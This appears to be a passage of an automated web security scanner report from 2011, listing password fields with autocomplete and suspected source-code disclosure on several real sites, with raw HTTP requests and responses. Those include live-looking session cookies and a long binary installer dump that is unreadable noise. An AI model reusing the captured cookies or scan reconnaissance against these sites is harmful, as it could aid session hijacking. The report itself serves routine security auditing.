<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.26. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=e&special=&ndb=1%20target= HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:58 GMT
Connection: close
Content-Length: 84512
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=ANHBFPGBIPJBOMEOPOAIEKOF; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Clean Seas cuts its financial losses</tit
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

12.27. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

12.28. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fis/worldnews/worldnews.asp?l=e&country=0&special=&monthyear=&day=&id=40138&ndb=1&df=0 HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:55 GMT
Connection: close
Content-Length: 85187
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=BNHBFPGBFIEBPIMMLFCBGCMM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Government committs to almadraba for furt
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

12.29. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=-qUnohNObFQ;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 01:15:42 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

12.30. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=DLDUrVQYtAM;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 01:15:45 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

12.31. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; expires=Fri, 04-Feb-2011 01:16:56 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...
</script>
                                   <form id="login_form" action="" method="post">
                                       <input type="hidden" name="SECURITY_TOKEN" value="8107be01ab" />
...[SNIP]...
<div class="formElement">
                                               <input class="text" type="password" name="LOGIN_password" value="" style=" width: 216px;" />
                                           </div>
...[SNIP]...

12.32. http://www.sipc.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:20:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

13. Source code disclosure  previous  next
There are 5 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


13.1. http://community.invisionpower.com/public/js/3rd_party/prettify/prettify.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://community.invisionpower.com
Path:   /public/js/3rd_party/prettify/prettify.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /public/js/3rd_party/prettify/prettify.js HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568; cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Tue, 04 May 2010 17:17:42 GMT
ETag: "3cbd-485c7e31a9980"
Accept-Ranges: bytes
Content-Length: 15549
Cache-Control: max-age=31536000
Expires: Thu, 02 Feb 2012 22:25:36 GMT
Content-Type: application/javascript

window.PR_SHOULD_USE_CONTINUATION=true,window.PR_TAB_WIDTH=8,window.PR_normalizedHtml=window.PR=window.prettyPrintOne=window.prettyPrint=void
0,window._pr_isIE6=function(){var a=navigator&&navigator.u
...[SNIP]...
</.test(b)?'default-markup':'default-code'),t[a]}V(s,['default-code']),V(S([],[['pln',/^[^<?]+/],['dec',/^<!\w[^>]*(?:>|$)/],['com',/^<\!--[\s\S]*?(?:-\->|$)/],['lang-',/^<\?([\s\S]+?)(?:\?>|$)/],['lang-',/^<%([\s\S]+?)(?:%>|$)/],['pun',/^(?:<[%?]|[%?]>
...[SNIP]...

13.2. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/director/sw.cab

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT
ETag: "e6016-25803-94636640"
Accept-Ranges: bytes
Content-Length: 153603
Content-Type: text/plain
Expires: Thu, 03 Feb 2011 01:02:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 01:02:23 GMT
Connection: close

MSCF.....F......D............................F..............|.................V=..!.swdir.inf...........V=r. .installer.exe.q...tO..CK..}|T..?|.%..&. ....!(......t.9.....2.B..L..!I.sxi.$..2.F.........
...[SNIP]...
<........{ ..<?. D...%...C>.h..y11._yk&.?d`.M.6....u.]..9..v...
(......d.uq3./....,....x...k.p....[.]...n...{.....$..@^...).0`.D.&..........qq?.\..1...J.uq....S\.I.'.....a@..9..-....z.....wq.Lsq..l...=.8.8...F@!..X1].\..@    .........Z@.......b.... g.:]...8=.s.l1.=.P.R.u.6Nh.h[..#q.../h.00&/.N.m.c`9.!../I..#..^.$.'..|....1~.gx...0.o;Yn.<.t&...z#....9...X.".......!.....8."......`.....Ts....4.,.......!..dk.........m.N...~.N>..<T1..<:...jTg..C..#..j..0..'.V.....}u......@.,..b..OFGGU.....\(..2.F../.V....@...G.]..Ml...O.0...<..za{.&....A&.yZS....:;{...l...D...wT..v. Ga..z.N?8..0B...A6.r+.......6..L......[....4..........C
..WoaiA.)...Cm)^h../...3V..;m5~.h...9.A....`.)..s..o.. ...Ha..8B.)......Y.DB..i..C..&.p^...MH.=.Y..T^..9l{.......!..24.J....V..R..8..rE......m.....P..[...$.B0u..j.PCz].*..F?...]
.6y".6.P.1.@k.8..9...l.W4s...X.b....4..............
.&D.M..1.....,.w... %d.....C...W........7....+..x..."..A.+|....g...Z..c\.{4S.TH..N.@.Uk..Eq:.Bu..G+...I.O.*...G../M.    .e...<A.....m>e.4Z...#..`.e.......H.(.Gi....h......../..E..0=.vf........[7.T.M.."5..JG....,_.B..UV.i.M.K.y.........w=..........on.~.....u....-...5..4.
..5|f.X_/...3w..J..8"......+.E.....x....._.X...X.......K.Q.3.D..i...N&..,?..+7.&.f.0.*/<....| .8.......OdM....W&...l&v?.H...{J.".B..B'o...b./ar    '..f.=.7.....S~r....}`...^...=I.y.D.C.A.....m..]L.+..R...3.fc u.y.    ...+.=..t....Ia'<?.d.r&..!].D..K... ..!.N...{,.EHW..x.,+ce..b1.-v.!.2a......./.......eS...:.S....H,`.....O    O'...m.....)/.h...-~9lut......[V.p....:_...<.6r.fw..`+..._......-.....c..y.L..}....Zyp7.7.f...'dz..R....ub.qL..3..PF...@l...Xk..$d.>(..qU.. ....N.G8[.)".3l#....
5..LL!..Z5Tj@.....b.. ....OE0.A...ZIX....H...r...".X......a>b*...Zi..M.Cs....\...b|.e`..I.*zT(...#U....QVV[<I.P+.1YL+.M.[..M.*.Kwx.l..2#..|!.....&..d.C.`2B{'..j.YA[.g.Z>3x.l(...s....
.x}....p..5...JG![$H3.....*<...h.g\....S..
.#....AI.Cy.Kv.. .^..4.%...M.2......b.W:.H,..........(.....3....
8-..v.....Y?._..O_..y..C.c.........N..2.F.x|...6..O..'..?...].l..L.{iA..M...y.cS.d[....U..;N..F5...S...B..i`oj.Px.....~b..x.! ...9?....c..J.o.}.,h.../x._..$....R_.7.d........7......yC.yZ...Q.SF`.....bO.y....|M....P.k.4j.n...^.........3h}...I..k!.|RYB.4.@.....UX..\(u~). !y..45.I..6NG\.'.X...DEE...{*.."...r..,..U..
".....Lh.2.....1!Q7.....x..A/.V/...t.I...[WF......,..........~...."..-..n&.+k.....b7.m....,/0..2.p..........O..,.......Q^`..2.YTE......P.`.ct[
...t...3]-A.......7.D&-.NB.x...+..<....8...so=....O-.'.;...!d..pL.P=....;.I...*...&10_mow...t...=..N.....z.OJ...".*.`.."..@..`Y.QN.....%.<.;.1.R&_....`..{..f...0..td.M..l..T..Z..p.\f...r..t..C......h..I..tD.....9.....b.-..'..3.....3..]5.Q.....bJ.e.....ZGbqm..!=rX.$1N^d.fm..I...Y;@...L$..S...~1c...I.q.&~...j.K^.. O.K.Lp.u4.......i...C...r....x...(...#FT..dV.\*....0........hTY.G.o6..>.........tv..g....G.2...aZ...../3.*..(;...VZ.W....../........N..6..).....R..L.,k...tD.-...>.......a......Ml-......lC.e.    ?j.:..][...H.8.&..iT..;K.M-.s:.hI..o)"Y.r.U....3/.Z:.Mo....T.-..\4...W ..z..t....;i.....p....y0<Zf..3G.$~a.l..N..o.....\Q.5:.......vaD7?d...-.....b....m..Sl]y.,....r.'i.O.&c.F.K...1t.h........h-.y..XG...i&.!yP...L..I..8m....../.!^0.*3.....=...8..R.m./..a.... ...k...NJl"-b.gk....5.X{.N\.>;:...U..D3.5WcP:.;-.Ff"..e.E&S.y.......|[...&q?....+...M.I......=..Mq..U.^.e^..[..J|......,#3.4.>`5`..k...dn..W.z.B.........v.u-....7x.#.    y.......1....2..p...`.....m..........Eh..X.Sz..%.i.F....    .N..^o.....`..7.H.,@t"...~...(..f}k......-..n(
M$&9Mg...jgt..R......K...Gu........./.7..^..}.\.......P&..U..^-#....7..p.j...........?........R....X......._..u(..B.@.\z...........e......|..... q..    .$......r.......X......\..EJ....b.._.K,.!..d.....L.....3..v..y}r...A.;..+...v......I..iV1..U.W.]...........f.:.m....y..S.c!:7XwYa"|. ;...=..6.
...t:.EoE.l.2)I.qRi.C[.J..m...Fm.0......9Fg...v...d..3n.n..C.E..H...6ta^.D.i.#...........%...D.`....=.....|...).U........{J...&m..a0...*.N.Gy[...{Z.%f..c>Q*P..U.3......)......4...9...h...]t..B..if.|.A;.!..t..6......+..|..B........U..G..8.
s.5..Yt.#...Nz.j.....S..6j.+.'....=......x:...8N....\Z...a...hc.B.....<e...M.....]..m...~.....~ INv.I6i....2......N%S.u.J....R.4.&Z..L
#.... ....S.........P....YCC>.[).kb.s<IF.9.l.O.L..H&...7i.bH.{#M..)Z    ^(.....Q..SmCbV.D..1M.-b......V....Wj!.o.n....YhD0s4....9.v5.qt..j.f..1..XQw....;;.OV.h.. ....    .....Gb|.%.A.`Av......a......&.8..C....A&....u.#..:-Q..G*u...Ojl....+.W(...V..2.V.....B+...~R.>&".(.T.......I.t..TUps%".......f...r.@kU.....t..T.?xA..Nh&..[6..1bb..].(.0.b.\....=..Yc..7..6{......:{...W....1O..f..m5}....O.^a..F./E..4B.....yC..k..=....eU9..0...8.y..Q..%d...M...'0o.........NH...f.;.>...rt......y..M..e....|:.......%..-..8C8[..*
...}..i.>D.
]M.q:...Od7.*.l..c.....d...-t...?6.N'.lm4.....dc(?.~v.|t.[....v./.....#.>.....Q.....8Z8D..]&{..o'...|.v...?...l:.mb....,...5`..h(...[a.`.Y.oE.Z.v.{9q|..][!.J...._k..^.'......,v.-..G...b.5..&b....8:Zi......)X2..IR.....y.c.......-L.v#.|.......)u..si...x..0..N.Rjo.......\..=.....-r&.bs.........vxs.t.....K....O4S9.......t*...G.tF...l.[.E...T.`5.......qf....-Yq..p..V..m..Vc..b.*........R..I.j.y.-r7..f.JI.-r.....S|...o.HO...........8.]4..........`~.s..ID.....3FA+...S..V.-.I. ...N....^.N.K.)Ct"c..$...h..K.^..nR.v!#dQF.N.l.Nu6.P...-~.........[G...~.`(q9..|.].\..^4L8SOP...Z&O.%XFL#u.....{.....gl........@{.l.....v.iy..._aLl!..}.Q..i.^...S..L+...N...r.LR.I...ou......<...4S..~....iC...Q..(.A.H;....J.W .....^.&Ntd.V;......f..va...7...>........st.'..k....Gv>&..^....../....\.#?...sd.n...w........v.hc.......?.}..#P.O.g6.$;;sQ..
.0.(..n.-.....1>.`.......:{..a.(.X....v.Z.QmV...i:.. (Hv....<.t<|(.>.^.bGp.=...c.2.. 7aX.jM.>m.B.qI.{h9|D.....;...FT.P...=X6d.ll..V.....`.^..M..... -.+..qj.u7E^....M.......F..2...T.}.j{..    ^G..'Zy....I...h..Z+...
.....:oW.    ~....o.....h..:...P.tt..>..Qv.S.=t'.l@".D.V&.s.$....3.5.......j}D...v.t.x....]\i..........o.].`.2
.....t.a...O@.....Y^km..b.bV..d......,.....^..t.~'.qE.WN..{.U`.rY.#RK..j>...zD3...3...y...$$.\.b...f..lI9.T0.P..i..!.-....;!.O}...M0.%>.+.'.
.p]hSw.
X2......qJ....a.D.5......W.(........u.e.Gl-.[..b....UM..K]B.B.?LW...CdQ..m.MWa..^`.w.2.....?..>6..I}....%W..Y....ohg....].../.........7.f.....x....ma'.... a.........P.EZD.y.Lj....|......s.V.......A.^~VY(..NzYY(S{.p....F..[,.........Sj9...g.....*^........U...ph+...RP..X..P...S.?j......ib.\Z0}.v.ax.....b..x...N.P.=..'.....GS...rt..W.4{Q...|b.`...Z.s~)L...........~..m..t. .|...%.h-......zg.v..k...Y.3.m......xD...B.....(dR.w.....32[..v...5..3.6E...^..G..
..........v.YtkNB.......BF...V"....{he_9..p..&.,..]:.NL(#.......U(gQ.......f.V..c......G..B.`W*:.~EA.P.........T.f../ g.3mmO..$.E9.vS..4j..7....B..ChH..lm.d.DTG...BSJ1.o...E..@....?..S...=?8n.N!^E.........mZp<{....*......Q.......o..7...:.I|%..J#.a..6<....%e..H...o..{!..
...1d....C..v+.YGI.'nbcS..SP.......
.D..<...    ...(O.....;.o.2....x....k\J.(...........l.3.=.e.....m5....&m.:.V<c-...q...G.S<3:......../3..Y.<P.VN.5..N.......3WT.........C..%.wU....=./LL.4..i:.....PN.....T..!.G..J|....!K*.F(HS...ZI\s%..l......4q..2g..FqB....s......V.K.v.H:d............:...:(\....k..N...U....M.{(f.W[....9..`.A.. .4..s....F..D.%^...g=..<C....6ed..:..MG.6.]wv..|......;m.Y..[..H...!._.{..[.}pe7.1..r.~ZL...=.....R...2wSt-.....d1.}2.C.=r...Q.}....4..P.tvm.....l..U9.j.v....>c.E..2...U&.b;."....O..d.oVuo../...A.6..B..})V..}{H?I.x...R.m;.Z.ch=.N.Y.......(.3.*..N+E..#-.C.Wc..:%AZ{,.>4.zC..~6....}^.e..._..Yf}.O..v&
..6.....{h..*....%d\.?@v.........AZ3M.r~....E.m.    ...?..YP...VD.....|J......t.._.N.P.v..y.....Z....K... .6...Y&..0...^....h.f...#....G.....QF.#?......g...`.m.x.....4.(......-..:.Yd....Q.&[.cf.xg.(5...S....,rO+.......8!.S.A..J.v........}.b.,...l..<..ts.....}...._R...Rv....j...U.,/..6...m..6rX............z.m.10.j1....(...?......Z+m6.>|0.}#g...,...a..'..    .^..?..Vr........4xu.i....b~m..Fq|.X.Z.Y...].9.`q.".b.j.....@..8....&8.......t...3...e."..H...yE.x...m...u.C...?.....m..i.ok.......6.n..;;......V.m....(.....z`......rOI..../.#*!m.?..;....9Mv^+T.fw..Z.L....ntG;.....l|t42I....
$..n:e....a.......    .lv.&..BHs.....,.~D.....0..g.}..%%..y+..$.j..H    .97.#.k..X.H...........<........qt......t).].c...gx}..C....*1..Dr'1..E..%%....YE.../n........
.'.....
1-d/YA.P...-V..s....I..%&.A....3....K%[.I..............=/..>.g......y~H;l.U1d...Z.J...Te......a....t....../..J[..@x..N1.....I.. ...|.+....(.R...|    
Vpy..$"...S=..PMi...^.......Jz|~../a....$...).(...b....j........\Y:...,..i.............z..ea...j............$._.$3..4...`......V?.&..m.+V..........d....33.......?$^%......:.@...AOh....V.....%..Z..^m.N.&].mQ.=>.m....]...\i.2!bG.....<.y/..2.......X...]x2fn..mK;...C.Wm.M..2...[N.%.......%O7{.r/t.6.g.W.....?...E.Q.M.
c.W.......P..d....
&..'....S...R.O..FiV;.|..r..6
........~J.3.$..'....c........b...O..W..g.......g+.....    c...A......E.M...Cl......V.....$.E#.0.Z...gh./....4..zy......Yo.R..X..I.C..$.!..n.Zl..r.0.).F...`.e.%....~.E[.Ad...j...COr.O..iA"_..... -..%{.+.lm.......*......".[...,..$.'..j.M4l..CZ..=....;:@....^@..L.We.c.,......<...>.L..+,r?..-.Hp..........Jb....Xd....F'...*{/..M_....[....m.......C....#q3...$...{.7zm.B.=..z.7.......i..3..b....9..+.F.bHi.]U.9..-U.....f<K.F..OJj..0.|J.=.......f ].W.~.Z..&."........^.%.Uj.-5..S....i..]......(Qg..g|.m......4....;.....Av..
.&....$YK.....,.-.W.....o}...M.-.r.B.E.Y...m
.f ./..>..z...bV#-..+.O..-.VX#'lm.....:...|......r.bi.@ek..Yt    E>..:=[?T....@I...m.D+..UO.|.o`....1.......:..I_..."`v..).K..vB.}......S.\.vj.....<.G.K...3...];....`.../kF......+...'.^.8U...W.~.}..E.X .RQ.26K....v;./.Z..5.1....~....Gi....\...K....%.-...OjG'.R.Y...S.
..tt..(...........lA.*.&].(....+7.O.l....>~.m..GWB...r._....m7.j.J=ja.....lm.q'cs.26I\].<..N.]...paII"..t...F..U.^...i>.}.....uGw......~.....j.yKA..cv....pC.P.WD.+-$.>Z..O..J.....l.l$..U.....U...Uz......`./x....(Vhw......_CBC.?.-.....D...oy.@.3...I...4Z.e.e.......5.N..1.z.>...n.`...&.3<..;?...@..5+?.3./_O..R..7l.:........yNU.....5f..U[iV..L.....w..Q~N..P"...b.;b.q....w..-v.a.`.'...........e.2uy.#(R..a.i7.4.L.Sh..%.@.f..c.R.....G~{.i&;\...y..^0.>.Iw.V.T.. .)Cg5i..l..|..V..;-.X.v..}.H.Q.'. J.....F.}.D.`...v+..w..eR...i]...<..!3.n..~'..U.|Ar.....G.W.....q{S.|.f.X.i._..lK.Km........H    .).d.>KG.j...#j..'.SL<    #y...nO8.....g.{..,....7}5d..n.rH!.......3.( Qb.W    |.&.zM.\3.[..ho..r...9Vb...}.-a..>Sz> k.i........%..Hjf1.b.8lYC...+.%.....bq@@.?.....*    .6^..g......J4..*i_.......x...4/.PF;.....E....n{.`{....L8..~....[......Qs...%.....r.J.\...0.\a{i4<W....i....0...l.O.?J.l;-.,.2[8...x.
.=Z....DK.FKV......h.{..~.....+c........^..g.\.}#.Co.`.Yr. ..R2...S#.....f:Ia...}..q .u'.xsO...:.>q......./.F.._.......m/}.86...rO4<._....[.z.~:xw.CD.m..5..5.Vg......'.PEA.6....    ..c.T4.E.............!...E....%
4<../t..]d{.....M.{G.s....I."...2?....iR.    ...&]..9.[n.....k....R..u.E.....Zki....|.....Z.ed'....2_....Cbd.........fSO...../..@:}o..N.....q..%1O..N    .YV...{...?.0......Up.c....EZ!?...]    ;"3...z.)a.oz1_J.t.)....f..7....f....~.....S.....{W7_J.B........3.q......2..^g h.z....E...hO."..-.A./....&...N%#...P.t06..\gw...hg|.....bA...e<._..|..5._...=..Q.S.I7..7..k....xZmag7?G. fzl..Ck.f.C.r.Mj...... .|k....m.R...P,{Bl.....&.fo..]=...W`u..."t.....'..]A)P...g....p6p..]w.y...W4.|...Uw......a..+18......!E..i..N<..n'.s.....0.......x.}.uy._!..(.\........`&.....v,.z....F.m.I'.7_..Q.UTG1m*...'..R....l..#....f.....s....Ie..2..3.;0....f.{...4.+.F.=...6.._.....V;.vX..Fp................i.<........^&.42.h.......:.ay.....".^!.=Q...Q....v.$.z...P..K.....Qi$...    .")i.b
.Vt.f...kMz.9..x..8..Uj..y.l...o]X,....J.G..pv..X...4V4......GJ.CQwQ...,._..+.....4..    f.3.l.-#.$fs.C.Ayr[.G....M.."Nw..Z..Jo....:...K......`..R6...
...0...iG.fE+...../..[V....M.Y.O#..........=....."~..o........../.LG.
L..^.(.."xCE=}........U........(A
